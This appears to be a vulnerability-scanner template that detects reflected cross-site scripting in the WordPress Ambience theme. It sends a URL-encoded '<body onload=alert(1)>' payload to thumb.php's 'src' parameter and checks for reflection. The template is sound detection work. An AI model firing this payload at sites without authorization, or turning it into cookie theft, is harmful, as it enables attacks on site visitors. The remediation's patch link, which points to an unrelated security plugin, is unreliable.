id: wp-ambience-xss
info:
  name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
  author:
  - l0ne1y
  description: "WordPress Theme Ambience \u2018src\u2019 parameter cross-site scripting vulnerability\nAmbience is a simple personal blog theme from the WordPress Software Foundation.\n\nA cross-site scripting vulnerability exists in WordPress's Ambience theme. The vulnerability results from the program not properly validating user-submitted input. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which could allow the attacker to steal cookie-based authentication and launch other attacks."
  severity: medium
  remediation: |-
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/wordfence/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    part: body
    words:
    - <body onload=alert(1)>
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
  method: GET
